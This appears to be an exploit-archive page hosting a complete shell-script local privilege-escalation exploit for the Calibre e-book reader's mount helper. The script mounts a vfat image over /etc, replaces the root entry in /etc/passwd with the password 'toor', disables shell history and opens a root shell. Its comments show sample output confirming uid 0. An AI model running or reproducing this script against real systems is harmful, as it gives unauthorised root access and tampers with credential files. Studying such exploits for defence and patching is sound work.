what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Calibre E-Book Reader Local Root

Calibre E-Book Reader Local Root
Posted Nov 3, 2011
Authored by zx2c4

Calibre E-Book Reader local root exploit that uses the mount helper to mount a vfat filesystem over /etc and then tinkers with /etc/passwd to make the root password toor temporarily.

tags | exploit, local, root
SHA-256 | 803cea9af662f56f8c5d24c4e88e0d59ba6548ac865fb65d1a853fca08aef00c

Calibre E-Book Reader Local Root

Change Mirror Download
#!/bin/sh

#######################################
# .60-Calibrer Assault Mount #
# by zx2c4 #
#######################################

################################################################################
# Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
# and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
# more fundumental issue with Calibre's mount helper -- namely, that it allows
# us to mount a vfat filesystem anywhere we want. By mounting a file system
# image over /etc, we are able to tinker /etc/passwd and make the root password
# temporarily "toor".
#
# - zx2c4
# 2011-11-2
#
# Usage:
# $ ./60calibrerassaultmount.sh
# [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
# [+] Making overlay image:
# 51200+0 records in
# 51200+0 records out
# 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
# mkfs.vfat 3.0.11 (24 Dec 2010)
# [+] Mounting overlay image using calibre-mount-helper.
# [+] Copying /etc into overlay.
# [+] Tampering with overlay's passwd.
# [+] Unmounting overlay image using calibre-mount-helper.
# [+] Mounting overlay to /etc using calibre-mount-helper.
# [+] Asking for root. When prompted for a password, enter 'toor'.
# Password: [typed in toor to the terminal]
# [+] Unmounting /etc using root umount.
# [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
# [+] Getting shell.
# sh-4.2# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2# whoami
# root
# sh-4.2#
################################################################################


echo "#######################################"
echo "# .60-Calibrer Assault Mount #"
echo "# by zx2c4 #"
echo "#######################################"
echo
echo -n "[+] Making temporary directory: "
dir="$(mktemp -d)"
echo "$dir"
cd "$dir"
echo "[+] Making overlay image:"
dd if=/dev/zero of=overlay count=51200
/usr/sbin/mkfs.vfat overlay
echo "[+] Mounting overlay image using calibre-mount-helper."
mkdir staging
calibre-mount-helper mount overlay staging
echo "[+] Copying /etc into overlay."
cd staging/
cp -a /etc/* . 2>/dev/null
echo "[+] Tampering with overlay's passwd."
cat passwd | tail -n +2 > tmp
echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
mv tmp passwd
echo "[+] Unmounting overlay image using calibre-mount-helper."
cd ..
calibre-mount-helper eject overlay staging >/dev/null 2>&1
echo "[+] Mounting overlay to /etc using calibre-mount-helper."
calibre-mount-helper mount overlay /etc >/dev/null 2>&1
cd /
echo "[+] Asking for root. When prompted for a password, enter 'toor'."
su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close